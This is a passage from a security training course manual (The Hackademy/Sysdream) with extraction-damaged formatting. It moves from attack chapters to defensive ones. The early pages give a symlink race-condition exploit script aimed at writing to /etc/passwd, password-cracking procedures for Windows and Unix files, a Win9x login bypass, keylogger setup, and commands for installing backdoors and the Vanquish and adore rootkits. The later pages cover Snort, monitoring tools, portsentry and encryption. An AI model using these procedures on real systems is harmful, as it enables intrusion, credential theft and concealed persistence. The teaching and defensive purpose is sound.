Instruction of openung file

Instruction of writting file

The Hackademy

DMP

-161/209-

SYSDREAM

Exploiting this type of vulnerability is relatively difficult because of the vulnerability's punctuality. We will notice that here the modification of “switch” must be done exactly between the verification of rights instruction and the opening of file instruction. To manage this, we will use a shell script that transforms the “switch” file into a symbolic link on “target” over and over again so that at one point the replacement of the file by a link happens at the desired moment. The “race” program must likewise be started over and over again: $while true;do ./race ;done; Script shell #!/bin/sh while true do touch switch sleep 1 ls -l switch target rm switch ln -s switch target sleep 1 ls -l switch target rm switch done

Programme race.c #include #include #include #include #include #include int main(int ac, char *av[]) { struct stat fstat; int fd; if( ac < 3 ){ fprintf(stderr, "Usage : ./race \n"); exit(2); } if( stat(av[1], &fstat) == -1 ){ perror(NULL); exit(2); } //Verification of user's rights if( fstat.st_uid != getuid() ){ fprintf(stderr, "Error : Permission refused\n"); fprintf(stderr, "Uid file : %d\nUid User : %d\n", fstat.st_uid, getuid()); exit(3); The Hackademy

DMP

-162/209-

SYSDREAM

} printf("Opening of file authorized !\n"); //Opening of file if( (fd = open(av[1], O_APPEND|O_WRONLY) ) == -1){ perror(NULL); exit(4); } printf("Writing ....\n"); //Writing in the file if( write(fd,av[2], strlen(av[2])) == -1 ) perror(NULL); close(fd); }

The countermeasure The one countermeasure that immediately comes to mind for this type of attack is the locking of files, in other words to place a lock when an application has access to a file in order to prevent another application from having access to the same file. One might think of using semaphores as they can block access to data that will remain inaccessible until they are ready. A more complicated remedy could be to establish a diamond that would be the only one to be able to have access to the files; this diamond could not be bypassed during the opening of a file. When an application requests such an opening, it would ask this diamond that it effectively open the file and take care to note that the file is open, so that if another application were to ask for the opening of the same file, the diamond would refuse, the consequence being to refuse any competing opening of files. Finally, the countermeasure we suggest is a most simple one and it is also very efficient... All that has to be done actually is to modify the order of the instructions. So we will start by opening the file and we take good care to lock it to prevent any other actions on it. We then check the user's rights, and once that is done we take off the security lock and then proceed to write in data. This way, we avoid encountering a problem of the “race condition” type.

The Hackademy

DMP

-163/209-

SYSDREAM

So the succession of instructions is as follows:

Opening file instruction

File locking instruction

Verifying rights instruction

Unlocking file instruction

Writting file instruction

race2.c program: #include #include #include #include #include #include #include int main(int ac, char *av[]) { struct stat fdstat; int fd; if( ac < 3 ){ fprintf(stderr, "Usage : ./race \n"); exit(2); } //Opening of file if( (fd = open(av[1], O_APPEND|O_WRONLY) ) == -1){ perror(NULL); exit(4); } sleep(10); //Locking of file flock(fd, LOCK_EX); if( fstat(fd, &fdstat) == -1 ){ perror(NULL); //Unlocking of file The Hackademy

DMP

-164/209-

SYSDREAM

flock(fd, LOCK_UN); //Closing of file close(fd); exit(2); } //Verification of user's rights if( fdstat.st_uid != getuid() ){ fprintf(stderr, "Error : Permission refused©e\n"); fprintf(stderr, "Uid file : %d\nUid User : %d\n", fdstat.st_uid, getuid()); //Unlocking of file flock(fd, LOCK_UN); //Closing of file close(fd); exit(3); } printf("Opening of file authorized !\n"); printf("Writing ....\n"); if( write(fd, av[2], strlen(av[2])) == -1 ) perror(NULL); flock(fd, LOCK_UN); close(fd); }

The example presented here only serves to illustrate the principle of “race conditions” but it also gives a good idea of how to exploit this type of vulnerability. We are thinking in particular of the possibility of adding a line in the file/etc/passwd or /etc/shadow file, and so creating an account with privilege rights.

The Hackademy

DMP

-165/209-

SYSDREAM

CHAPTER VI SYSTEMS' VULNERABILITIES

The Hackademy

DMP

-166/209-

SYSDREAM

1. Authentication Brute force In this section, we will talk about cracking password files for various OSs. Let us start by explaining the 3 methods used by softwares to crack password files. Dictionary attack This attack is the quickest one because it does a pass test using a dictionary file (this is a simple text file with one word per line, one after the other). To have an efficient dictionary, you must collect a maximum of information on the users of the target server. On the Internet, there are many already complete dictionaries, as well as generators. Brute force attack The idea is to try all the combinations possible following a certain number of characters. If the password to crack has several special characters, both numbers and letters, it will take longer to brute force than a pass made up of letters only. So a brute force attack always succeeds, it is only a question of time... Hybrid attack A hybrid attack is a mix of the 2 previous attacks. It uses a dictionary for the main part (e.g. crash) and brute force for the final part (e.g. fr), which enables it to find passwords such as “crashfr” or “crash24”, etc... A) .pwl files of Windows9x/ME Files with the .pwl extension have your Windows passwords, they are in the root directory (c:\windows). Of course, all .pwl files are encrypted, as you will be able to see if you try to open one with a text editor such as notepad, for example. These files can contain connection passwords, saving screens, sessions, ... To decrypt them, you must use software such as Pwltool (http://soft4you.com/vitas/pwltool.asp) that will take care of cracking the file and then display the passwords clearly.

The Hackademy

DMP

-167/209-

SYSDREAM

To start an attack, you have to select the .pwl file by clicking on the “Browse” button, then try to click on “Glide” (this option only works for old PWL files on Windows95 and 3.11 and enables you to visualize all passwords without even knowing one login!) If ever “Glide” does not work, try “CheckPass”, and if the session pass is empty, you will be able to have access to all the others passwords in the file. Attack with dictionary Configurate a dictionary attack by clicking on the "Dictionary" tab. Then select the dictionary to use by clicking on”Browse”. To launch your attack, click on “SearchPasswordFast” or “SearchPassword”...

Brute orce attack Click on the "Brute force" tab. The Password length parameter enables you to define the length of the password to force (the larger the range, the more the number of combinations increases).

Charset string indicates the characters to use during the brute force (you can include numbers as well as special characters such as “@”, for example). To launch the attack, click on SearchPasswordFast (this is quicker than “Search Password” because it does not use the API windows). If the attack does not succeed, click on “SearchPassword”.

The Hackademy

DMP

-168/209-

SYSDREAM

Hybrid attack T launch a hybrid attack, all you have to do is go back to the dictionary tab and click on “Hybrid brute”:

Bypassing the Win9x password When win9x is started and if passwords have been configurated to have access to the OS, it will ask you for identification using a login and password. We are going to see in this section the various technique to bypass this identification... 1) Try to click on "Cancel", you should normally have access to the system. 2) When starting your computer, click on “F8” to show the start menu (or try to boot from a start disk). Choose the MS-DOS mode. Now you are going to have to replace the .pwl files' extension by something else to prevent Windows from finding it: To do this, type in the following command: rename c:\windows\*.pwl *.xxx Restart Windows, type in any password and you will see Windows ask you to confirm the new password. This means that this new password that you type in will be directly earmarked to the selected user account (login).

B) The Sam file of WINNT, WIN2k, Win 2003 et Win XP: The Sam file The Windows system has two encrypting vulnerabilities that can enable you to decrypt a Windows password file faster than Unix password file, for example: • •

One of these vulnerabilities comes from the LANmanager's hashing; it divides passwords into chains of 7 characters. The other one comes from the absence of salt (a function making hashing different for 2 identical passwords). To be clear, if 2 users choose the same password, encrypting will be exactly the same, which makes the hacker's task easier.

As in the case of win9x, there is software that can crack user or administration passwords. On NT systems, passwords are saved in an encrypted SAM (Security Account Manager) file which can be found at c:\WINNT\system32\config\SAM. You cannot visualize or copy the SAM file when WINNT is running because it is locked by the core of the system.

The Hackademy

DMP

-169/209-

SYSDREAM

How to obtain this file: 1. When WINNT is installed, a copy of the password database (SAM file) is created in the c:\WINNT\repair directory. This copy only contains the passwords by default created during the set up, meaning only the administrator's password. When the administrator updates the repair disk, the SAM file is also updated (in this case, the SAM file contains all the accounts). So we could get the SAM file from the repair file, as this one is not locked by the core. If the repair file does not have the SAM file, there is still another way of obtaining it. 2. The PC has to be booted from a start disk or from another operating system. This way, WINNT is not executed and so the SAM file is not locked. We can then copy the SAM file onto a disk and crack it later on. The Sam file is not the only medium that can allow you to find passwords on a network using NT. Let us take the L0phtCrack tool, which is the fastest and the most efficient to find NT passwords, because it does not only use the SAM file to have the password hashing, but also uses the encrypting vulnerabilities seen previously. You can find an LC3 evaluation version at: http://www.atstake.com/research/lc3/download.html. First of all, the assistant will ask you which method is used to recover the password hashing. (If the assistant is not automatically started, click on the magic wand, the 6th icon from the left on the main interface).

The Hackademy

DMP

-170/209-

SYSDREAM

LC3 offers 4 methods. 1. From the local machine To use this option, you must have Administrator status on the machine. This method will very quickly reveal the users' passwords. 2. From a remote machine Here, you must also be Administrator, but this time round the password hashing will be recovered from a remote machine of your domain (you will need to specify the name of the machine). This method does not work with a remote machine using syskey or Win2k.

3. From NT 4.0 emergency repair disk This option will use the SAM file, the one found in c:\winnt\repair or saved on a disk (you will need to specify the SAM file to be used). 4. By sniffing the local network LC3 also includes a sniffer to intercept the hashing of an NT network's machines used on the network. Then you will be asked which brute force method is to be used: Click on "Custom Options" to personalize the attack.

LC uses the 3 forcing methods seen earlier on: 1.dictionary attacks 2.brute force attacks 3.hybrid attacks

The Hackademy

DMP

-171/209-

SYSDREAM

• • •

The first slot is the dictionary attack (click on Browse to indicate the password file to be used). The second one is the hybrid attack, which you can configure in the “File” --> “Preferences” menu on the main interface. The last one is the brute force attack (“-” is used to specify a character range).

The menu below allows you to choose the information to visualize during the cracking. 1st slot: Displays the passwords once they have been found; in some cases it can be useful not to have them displayed. 2nd slot: Displays the passwords).

password

hashing

(the

encrypted

3rd slot: Displays the length of time to crack each password. 4th slot: Displays a warning when the attack is over.

The Hackademy

DMP

-172/209-

SYSDREAM

B) The Unix passwd file On Unix systems, the encrypting system is univalent. Files storing passwords are in most distributions in the “/etc/”” directory under the name “passwd”. In more recent versions of Unix, the passwd file has been divided into 2 files, because the passwd file on older versions could be read by anyone, enabling a user with no particular rights to obtain the stored passwords' hash. root:6Tgy1Gs.fTrfS:0:1:Admin:/:/sbin/sh john:K6fRti29nFrsY:1001:10::/usr/john:/bin/sh sophie:H74jGhhTDsE2i:1002:10::/usr/sophie:/bin/sh paul:fTqzOyHs88sfZ:1003:10::/usr/paul:/bin/sh

The format is: login : pass : UID : GID : complete name : personal directory : shell Nowadays, all passwords are saved in a second file called shadow. The shadow file is only accessible if you have root status on the machine. Do note that the passwd file still enables the hacker to know what the system users' logins are, so as to create a dictionary. Now, on most Unix systems, passwords have been replaced by “x” in the passwd file: root:x:0:1:Admin:/:/sbin/sh john:x:1001:10::/usr/john:/bin/sh sophie:x:1002:10::/usr/sophie:/bin/sh paul:x:1003:10::/usr/paul:/bin/sh and in the shadow file: root:6Tgy1Gs.fTrfS:11604:::::: john:K6fRti29nFrsY::::::: sophie:H74jGhhTDsE2i::::::: paul:fTqzOyHs88sfZ::::::: The format is: login : pass : date : min : max : warning : expiration : deactivation As for NT, there is software that can crack Unix passwords.

The Hackademy

DMP

-173/209-

SYSDREAM

Let us take for example (http://www.openwall.com/john/)

John_The_Ripper,

who

also

functions

on

Windows.

Once the software installed, type the following commands (in this example, the dictionary and passwd files are on a disk): john -test (to see if john is functioning correctly) john -single a:\passwd (john's quick method of cracking a password) john -show passwords)

a:\passwd

(can

visualize

cracked

john -w:a:\dico.txt a:\passwd (attack with dictionary) john -i a:\passwd (brute force attack)

The Hackademy

DMP

-174/209-

SYSDREAM

C) Authentication service One of the ways of entering a server is to use cracking on an authentication service remotely accessible. To crack a site, you can use software such as WebCrack which enables you to carry out a dictionary attack on a page using HTTP authentication.

In “Target URL”, you must put the target URL you wish to crack. In our example, we try to crack various services, such as FTP, POP3, Telnet, SMB, etc... The options are roughly the same as for the previous software: Connection Options Target : Target IP Type : Type of services (FTP,Telnet,etc...) Port : Target port Connections : Number of simultaneous connections Timeout : Timeout length of time Proxy : To use a proxy (see further on in the course)

Service Options Depending on the type of services selected, you will have various options in this section. Authentication Options Pass Mode : type of attack (dictionary, hybrid, brute force) The Hackademy

DMP

-175/209-

SYSDREAM

Security There are a great number of softwares able to crack any number of protected file (pwl, sam, zip, excel, word, etc...). •

• • • •

• • • •

It is therefore important to always choose a password with a maximum of alphabetical characters, numbers and special characters (to increase to the maximum the amount of time that the hacker would take to find your password). Change password as often as possible. The hacker won't have the time to crack your password if it changes all the time). Use a BIOS password to have access to Setup and to the operating system and change the boot sequence to avoid having to boot from a disk. Avoid asking Windows to save your passwords (Internet access, messaging, etc...) For those who have never used a Firewall, install simple to use software such as ZoneAlarm, as this will enable you to detect any intrusion on your machine and to block certain ports or protocols. You should also install an antivirus. Update your operating system, as well as your software, as often as possible. Do not always use the same password for different identifications. Always change the password by default of all the services installed on your machine. Do not store any SAM files on its NT system, which is accessible to all.

2. System spying Among the applications dedicated to information spying, keyloggers are the proof that an efficient local surveillance of users is always possible. Invisible Keylogger (http://www.invisiblekeylogger.com) is one of these tools. Once the software installed, an icon appears in the task bar.

The Hackademy

DMP

-176/209-

SYSDREAM

The first thing to do is to create a password in order to limit the use of the software to the one authorized person. This information will be used to authenticate the log reader. The software's options can then make Keylogger invisible. They also offer a measure of control on the following points: –

Keylogger is stealth-like (this charges automatically when starting),

–

It discriminates on the applications to be spied on (all by default),

–

There is a delay between each screenshot (one every 10 minutes by default).

The software's logs then become consultable after entering the password.

The Hackademy

DMP

-177/209-

SYSDREAM

Please note that if this keylogger remains invisible from the list of Windows processes, other tools dedicated to process monitoring will reveal it to a watchful eye. Please refer to our chapter on monitoring.

3. Backdoors and rootkits A) Backdoor applicative This type of backdoor is generally uploaded on the system by the hacker once he has obtained access. On both Linux and Windows, it can be an applicative running as a server to bind a shell, or it can send back this access to the hacker with reverse connection methods. Following this principle, a simple netcat could do. Of course, the main problem for the hacker with this type of backdoor is that they are in no way discreet. To automatically launch a backdoor when starting the system, there are several possibilities: On Windows: Installation in the start menu Each user's start menu is a directory accessible in the personal directory of each user, allowing him to start an applicative at the start of a system. All that has to be done is to copy any executable in order to have it automatically launched at boot. ➢

➢

The register base

On Linux: ➢

rcX.d files

All services launched when the system is started are placed in the rc.init directory. They are started according to a specific runlevel, from 1 to 6. To be activated at the start, a symlink must be created in the rcX.d file corresponding to the proper runlevel.

RUNLEVEL

DETAIL

0

System stopped

1

Starting mono user

2

Starting multi-user without network

3

Starting multi-user with network

4-5 6

Starting multi-user, Xwindow network Restarting

To placer a backdoor on the system: #cp backdoor /etc/init.d/ #cd /etc/rc3.d #ln -s /etc/init.d/rc3.d

The Hackademy

DMP

-178/209-

SYSDREAM

B) Backdoor kernel Backdoor kernels are backdoors that integrate directly the system's core. The main advantage of this type of backdoor is that they remain very discreet, and are often very hard to detect. They are found on all operating systems: Windows Vanquish is a Windows backdoor kernel that, among other things, can: • • • • •

Hide the services of the ongoing process list Hide modules Hide entries in the register base Log logins and passwords Prevent files from being deleted

As you will have understood, when used with another applicative type backdoor, it becomes trivial for the hacker to hide his presence on the system, both at the ongoing process level and compared to some installed files, or to hide the automatic launching of the backdoor if it is in the run key of the register base. To launch the installation, start the command: c:\>vanquish do install

To hide a file, a process or an entry in the register base, all that is needed is for its name to contain the character chain vanquish. A log file, as well as the passwords discovered by the rootkit, are all referenced in the c:\vanquish.log . file. Of course, this does not appear during a listing of the directory, because it contains the chain vanquish. Linux Linux kernel backdoors are called LKM (Loadable Kernel Module), and often look like modules to be loaded in memory. The best-known is probably adore. It has the capacity to become undetectable on the system. The adore lkm will first have to be loaded in memory, followed by another module (cleaner.o) whose role it will be to hide the presence of adore on the loaded modules list (Ismod command). adore.o modules will then be piloted thanks to the ava binary. Furthermore, during the compilation, a password will be asked for and it will be hardcoded into the ava as well as into the adore.o modules to prevent any other ava binary from communicating with adore.o, making its presence in memory very difficult to determine. First compile the lkm for the system: tar xzvf adore.xxx.tar.gz cd adore ./configure make

The Hackademy

DMP

-179/209-

SYSDREAM

You will have three newly compiled elements: adore.o cleaner.o ava Then load the modules in memory: insmod adore.o insmod cleaner.o rmmod cleaner

If you display the list of loaded modules, you will notice that adore.o does not appear. You can direct the module thanks to ava. Here is the list of options: h u r R U i v

hide the file show the file execute the command as a root take off PID indefinitely (to be used carefully) deinstall adore make PID invisible during the listing of ongoing processes (ps aux) make PID visible

The Hackademy

DMP

-180/209-

SYSDREAM

CHAPTER VII GENERIC SECURITY PROCEDURES

The Hackademy

DMP

-181/209-

SYSDREAM

1. Intrusion detection systems Intrusion detection systems are probes that are placed on the network to listen to all transiting network frames. Their main functions are: – –

Detecting port scans. Detecting applicative and web attacks, by comparing the contents of network fames to databases of attack signatures.

The reference when it comes to intrusion detection today is SNORT, which offers a large array of possibilities. What's more, it can be used on both Linux and Windows. The first security rule to have when using an IDS is to not configure one's network card. It is put in promiscuous mode in order to examine all transiting frames, and in no way needs to be configured to communicate with other machines of the LAN. So, in case of intrusion, it is not possible for the hacker to try to attack this probe. That way you can be sure of having real results in case of a successful intrusion. Also, an IDS must be installed on a clean machine. As it is the only non-falsifiable source of information, any other service could be a potential danger for the integrity of the system, and therefore of the results obtained. We are going to start by installing snort on a Linux system, with a mysql medium, and a log reading via a php interface called ACID. First download snort on www.snort.org, as well as the signature attack bases on http://www.snort.org/dl/signatures. You will also need to have an apache installed, as well as a mysql database. cd /usr/local/snort ... tar -xvzf SNORT-1.9.*.tar.gz ./configure --with-mysql=/usr/lib/mysql make make install

Then we install the detection rules. mkdir /etc/snort usr/local/snort*/etc/snort.conf /etc/snort cp snortrules.tar.gz /etc/snort cd /etc/snort tar -xvzf snortrules.tar.gz

You can then edit the snort configuration file (/etc/snort/snort.conf), so as to specify the network that the IDS will listen to, for example: var HOME_NET [10.1.1.0/24] or var HOME_NET (10.1.1.0/24,192.168.1.0/24]

The Hackademy

DMP

-182/209-

SYSDREAM

Configure snort so that it can store its results in the sql database. In the configuration file, add the rule: output database:log,mysql,user=user_snort password=snort_pwd dbname=snort host=localhost

Then we can create the snort database. mysql >create database SNORT; >use mysql; >snort insert into user values('localhost', 'user_snort', password('snort_pwd'), 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', 'Y', 'Y', 'Y'); >ALL PRIVILEGES ON SNORT.* TO user_snort@localhost IDENTIFIED BY 'snort_pwd' WITH GRANT OPTION; >flush privileges; >use snort; >Source create_mysql

All that needs to be done now is to configure ACID so that it displays the snort results. You can download it at http://www.andrew.cmu.edu/user/rdanyliw/snort/snortacid.html. You will also need adodb http://php.weblogs.com/adodb, and PHPlot http://www.phplot.com. Then execute the following commands (make sure that /var/www is well and truly Apache's DocumentRoot): cd /var/www/ tar -xvzf acid* tar -xvzf adodb* tar -xvzf phplot*

Finally, in the /var/www/acid/acid_conf.php configuration file, fill in the following values: $DBlib_path="../adodb"; $Chartlin_path="../phplot"; alert_dbname="snort" alert_host="localhost" alert_user="user_snort" alert_password="snort_pwd"

You will then be able to see the results of the logs on http://serv/acid/.

The Hackademy

DMP

-183/209-

SYSDREAM

2. Monitoring on Windows Windows offers no native monitoring tool of the system's activity that is really efficient. A company called Sysinternals has conceived free, light and efficient monitoring tools. We have chosen to present several of them. FileMon FileMon is a utility enabling to monitor in real time the process' access to files on the disk. The name of the process, the type of request, the name of the concerned file and maybe the localization of data in the file are the informations sent back by FileMon.

RegMon RegMon is a very useful tool, that enables you to monitor in real time the activity of the register base, by displaying, like FileMon, which process has access to which key in the base, and all this while specifying the type of request.

The Hackademy

DMP

-184/209-

SYSDREAM

Pmon NT Pmon is a process monitoring tool: it sends back information on active execution threads on the system.

3. Anti port scan The methodology presented here is valid only for Linux. We are going to use software called portsentry to detect and block the source of a port scan. You can download it from: www.psionic.com/abacus/portsentry To install it: tar –zxvf portsentry-x.tar.gz cd portsentry-x make linux make install

When a scan is detected, portsentry can act following two methods: – –

By re-routing the packets coming from the source towards /dev/null. By applying an iptables chain, so as to block the source.

The configuration file is in the /usr/local/psionic/portsentry/ directory. Edit it to modify the base configuration:

The Hackademy

DMP

-185/209-

SYSDREAM

You can choose between a simple detection policy # Use these if you just want to be aware: TCP_PORTS="1,11,15,79,111,119,143,540,635,1080,1524,2000,5742,6667,12345,12346,20034,2766 5,31337,32771,32772,[..] UDP_PORTS="1,7,9,69,161,162,513,635,640,641,700,37444,34555,31335,32770,32771,32772,32773 ,32774,31337,54321"

and a much more restrictive one. Disable it if necessary. # Use these for just bare-bones #TCP_PORTS="1,11,15,110,111,143,540,635,1080,1524,2000,12345,12346,20034,32771,32772,327 73,32774,49724,54320" #UDP_PORTS="1,7,9,69,161,162,513,640,700,32770,32771,32772,32773,32774,31337,54321"

Three files enable you to have access to, respectively, the host list for which portsentry will not intervene, the historical file and the banned host file. IGNORE_FILE="/usr/local/psionic/portsentry/portsentry.ignore" HISTORY_FILE="/usr/local/psionic/portsentry/portsentry.history" BLOCKED_FILE="/usr/local/psionic/portsentry/portsentry.blocked" Finally, you can parameter the command to start, in case it detects a scan from a remote machine: KILL_ROUTE="/usr/local/sbin/iptables -I INPUT -s $TARGET$ -j DROP"

4. Cryptography A) pgp/gpg First of all, it should be remembered that there is a distinction between cryptography and encoding, these are two totally dissociated things. Encoding is the process which consists in transforming initial data into other, different data. Let us suppose that the initial data are texts. Encoding will modify these texts thanks to one, and only one, mathematical algorithm, into other, completely different texts. To find the initial texts again, the opposite mathematical process is used. So encoding always uses one single same mathematical process to function. As for encrypting, it uses different algorithms, that need to be used with a key. Old encrypting methods used one single key to encrypt and decrypt a message. Present methods use two keys: •

A public key: this key is freely accessible to anyone who wishes. It can be downloaded from websites, dedicated servers, or it can be sent by email. The public key is the one that is going to be used when data is encrypted. Once encrypted, this data is addressed to one person, and one person only: the one in possession of the private key.

•

A private key: this key can decrypt messages encrypted with a public key. The decrypting process is not the opposite of the encrypting process, which is why it is difficult to decrypt a message encrypted with a key without the other key.

The Hackademy

DMP

-186/209-

SYSDREAM

Here is a simple scenario. Let us take John and Sophie. John wishes to send a message to Sophie.. 1) He is going to encrypt it with the public key that Sophie gave him. 2) He is going to send the message thus encrypted to Sophie. 3) Sophie is going to decrypt with the help of her private key. 4) Sophie is going to answer to John with the public key he gave her. 5) So Sophie is going to send the encrypted message to John. 6) John is going to decrypt it with his private key. So four keys are used, that is two pairs of keys. Each pair has a private key and a public key. But watch out! In our previous example, it must be fully understood that John could never have decrypted Sophie's message with any other private key but his own. He is also not supposed to have other private keys than his own. So we always associate one public key, and only one, to a private key. This bases of this system were created by Whitfield Diffie and Martin Hellman. Then three mathematicians, Rivest, Shamir and Adleman, put together the RSA system, the first modern cryptography system, still very famous today. A very interesting utility will enable you to apply cryptographic processes (encrypting, decrypting, signatures) very simply. PGP (Pretty Good Privacy) is a popular tool destined to the general public and that allows much more than a simple encrypting. By using different encrypting systems, this utility has become a reference. At http://www.pgpi.org, you will find only the latest versions of PGP, for sale. However the GPG project (GnuPG, The GNU Privacy Guard), allows you to develop a free version of PGP, using the IDEA algorithm. You will find it at http://www.gnupg.org. The difference between the two certainly lies in their practicality.

PGP

The Hackademy

DMP

GPG

-187/209-

SYSDREAM

PGP Once you have installed PGP, launch PGPTray. PGPTray will keep PGP in permanent application, until you need to use it. Right-click on PGPtray (the grey keylock PGPtools.

at

the bottom right of the tool bar) and launch

Step 1 : Creating keys (PGP) The first icon is the one that manages and generates keys. Creating a key is very simple, and the assistant only makes the process easier. If you haven't created one already, you can always create new ones:

1. In the fields “Full Name” and “Electronic Address”, enter a user name (avoid entering true information), in “Electronic Address”, you can however put your own one. 2. Then choose the type of key you wish to create. In our example we will choose RSA. 3. Then choose the size of the key. We will choose 2048 bits. The larger the size (in bits) of the key, the greater its strength is. A small-sized key offers little security guarantee when faced with decrypting methods: it is an eggshell. 4. Then choose the expiration date of the pair of keys. Allowing a key to expire has both an advantage and an inconvenient. The advantage is that if your private key is one day found or your encrypting broken, renewing your keys will allow you to communicate once more without worrying about this, because the encrypting you will use, based on new keys, will not have been broken. The inconvenient is that you will have to send your public key to all your correspondents, update all your diffusion zones, etc. It is possible that one day a correspondent of yours will send you an encrypted message with an old public key that you will be unable to decrypt. So in this example we will not take an expiration date. 5. Then enter a secret sentence, to be used as a password. By “sentence”, we mean that the user should enter a whole sentence (so a long succession of characters) rather than a simple word. A sentence has a greater security value than a word. PGP actually includes a sentence quality indicator that can guide you on the choice of the sentence's length. This sentence will be asked when you use your private key (when decrypting). What is the advantage here? Simply that if someone manages to copy your private key, he will not be able to use it without the proper password. 6. Once generating a key is finished, you can send your public key to a key server. This will for example enable someone who only knows your email address to see if you have put a key online. This is in no way compulsory. 7. The process is over, you are now in possession of your own new pair of keys.

The Hackademy

DMP

-188/209-

SYSDREAM

Step 2 : Encoding and signing (PGP) The message signature process is a simple one. It allows Sophie to know that it is well and truly John who has sent these encrypted messages with Sophie's public key. Indeed, how could Sophie know if it is John who has sent these messages when her public key can be used by anyone? 1. John will encrypt his message with his own private key, then with Sophie's public key. That way there is a double encrypting. 2. Sophie will use her private key to decrypt the message encrypted with the public key (which is her own one), then will once more decrypt the message with John's public key because – and we did not mention this to avoid any confusion – a public key can decrypt a message encrypted with a private key as long as they belong to the same pair. So Sophie is sure that the messages are coming from John, because she was able to decrypt with her public key the message encrypted with John's private key, that he is the only one to possess. PGP helps you in this task: with a few clicks you can sign and encrypt messages. Let us see this. 1. Create a test text file in a test directory. 2. Name it “test.txt”, for example, and in it write any sentence (in our example the sentence is “encrypting test”). 3. Click on Number directory.

and select the data to encrypt. Here, you will select “test.txt” in your “test”

4. Choose the public keys with which you are going to number your message, by selecting them and dragging them towards “destinations”. The idea here is to select the people to whom this encrypted data is destined, by selecting the proper public keys. 5. You can select several options: •

Output in text form (if you wish the encrypted contents to be readable). This option does not have any consequences on the security of your data.

•

Deleting the original is an option that can be seen as a precaution, because once the original data deleted, only the encrypted data remains and there is no chance anyone can have access to the clear data without having the proper private key.

The Hackademy

DMP

-189/209-

SYSDREAM

•

Secure visualization is an option that can be applied only to text files. When the destination decrypts your data with his private key, the text will be open in a “secure text viewer”. This viewer will display a warning message reminding the user that he can only read this text in the most secure and confidential conditions. If the user clicks on any other place than the viewer, the viewing window will automatically close.

•

The self-extractable archive and conventional numbering options are not essential ones. You can however try them. For example, the self-extractable archive will enable you to put your data in the form of of an executable that will extract the encrypted data. This option can be used only with the conventional numbering option, which applies a numbering option thanks to a sentence that has the role of a key. This option is less secure for your data security but does not require the use of a pair of keys. This means PGP can use a key sentence (which is the same one during encrypting and decrypting) rather than a system based on a pair of keys.

6. In our example, we only choose output in text form as an option. 7. Click on “OK” and the encrypting is done. 8. Go to the “test” directory to see your encrypted file in /asc format. You can open this file as text (rename it “test2.txt”, for example). However, do not forget to put it back in .asc format after reading it, as this .asc format is recognized by PGP. This said, a text file in .txt format can also be decipherable. 9. Let us now see how to sign one's data. Remember that a signature is not compulsory. 10.Click on Sign. 11.Choose the file to sign, this file having normally been previously encrypted. As a signature is done with your private key, you will need to enter your secret sentence. The Hackademy

DMP

-190/209-

SYSDREAM

12.You can choose a separate Signature which creates a .sig file not pasted to the encrypted file. So you will have two separate files: one encrypted file, and one signature file. We will not apply this option. 13.The Output in text form option makes the signature readable in text format, just like the same option used for encrypting. 14.The signature has been done. You can however do this operation in one step thanks to the Number & Sign button:

Step 3 : Decrypting (PGP) To decrypt data that is addressed to you (we therefore suppose that you have the proper private key, or a conventional key in the case of conventional numbering), double-click on the .pgp or .asc file, or use the button: Number and Verify. 1. Click on the button 2. Select the file to be decrypted 3. Enter your secret sentence for the use of your private key 4. Choose to save the file again, in clear mode Step 4 : Adding downloaded public keys (PGP) Double-click on the .asc file (the one having the keys in question) and choose, with the window that opens, the keys that you wish to import. The two other functions of PGP (destroying and cleaning unused space) are not of any use to cryptography. The first one is used to to destroy files, and the second one to clean your disk space. We can now move on to the GPG user manual.

GPG, the free alternative to PGP GnuPG is the free alternative to PGP, under GPL license. GnuPG is considered as safe and implements PGP's functions. GPG is available for both Linux and Windows on the http://www.gnupg.org website. For our demonstration, we will use GPG on Linux. The first necessary step is to create a pair of cryptographic keys: $ gpg --gen-key The tool becomes interactive and allows the creation of keys step by step. Please note that, as presented, we can specify a key size above 2048 bits. The keys are generated in the most random way possible, using factors such as the movements of the mouse, the keyboard entries, etc. The Hackademy

DMP

-191/209-

SYSDREAM

Depending on the size of your key, this step can take some time. So files are created in the .gnupg directory from the user's home. These files contain the public and private keys, but they are not directly readable from the console. It is necessary to pass through the GPG tool, for example, to extract one's public key in order to send it to correspondents by email. $ gpg --a -o my_pub_key --export OWNER_NAME Your correspondents will import your key for their use in the following manner: $ gpg --import my_pub_key This file can then be sent to any correspondent, in the form of a file or of a clear text. They will check the proper integration with the command: $ gpg --list-keys To save your private key, the command is pretty much the same: $ gpg -a -o my_priv_key --export-secret-key OWNER_NAME Let us take the file with the test text, and let us number it with our public key: $ gpg -a -e -r OWNER_NAME myfile The -a option can give the numbered result in ASCII form (myfile.asc), which can be read. Do take note that our 4-byte file now has 1067 once numbered in this format. The owner of the proper private key used for this numbering will be able to decrypt the file with the command: $ gpg -o result --decrypt myfile.asc On the next viewpoint, not using the -o option can give the result directly on the terminal. We have seen all the basic functions of GPG, and already you might think using these online seems impractical. You should therefore note that there is a graphic front-end to GPG called GPA (Gnu Privacy Assistant, http://www.gnupg.org).

The Hackademy

DMP

-192/209-

SYSDREAM

B) Cryptography of hard drives Windows PGPDisk is a cryptographic tool integrated to the free PGPfreeware applications suite. Available at http://www.pgpi.org/products/pgpdisk/, it can create virtual encrypted disks. The user creates a chosen size file (space is allocated on the disk). This file is a virtual representation of a hard drive, and so has to be formatted, maybe with a file system different to the one currently in service. Once the file created, the setup operation will find the virtual disk from an entry called “E:”, for example.

Once the file is formatted and set up, we can copy any type of data within the available space. Once this data is saved, we remove the partition, thus making it inaccessible. To set it up again, you will have to enter the proper password. The file created is still accessible from the hard drive, and you must ensure that it cannot be deleted.

Linux On Linux, there is a very efficient encrypting system for files or hard drives, executing encrypting/decrypting on the fly. The idea is to associate a (hard drive) entry to a virtual setup point (/dev/loopX) that will encrypt and decrypt all input/output. It will itself be set up like a standard hard drive on a setup point accessible by the user. There are several encrypting systems, and several key lengths possible, available in a module form:

The Hackademy

DMP

-193/209-

SYSDREAM

Cryptoapis are integrated in standard in the kernel from the 2.4.22 version, but we will use a 2.6.5 version. The modules to activate are: Block Devices Loopback device support

SECTION

MODULES

Block Devices

Loopback device support Cryptoloop device support

Cryptographic Options

SHA 256 Digest algorithm SHA 384 Digest Algorithm Blowfish cipher Algorithm Twofish cipher Algorithm Serpent cipher Algorithm AES cipher Algorithm CAST5 cipher Algorithm CAST6 cipher Algorithm ARC4 cipher Algorithm

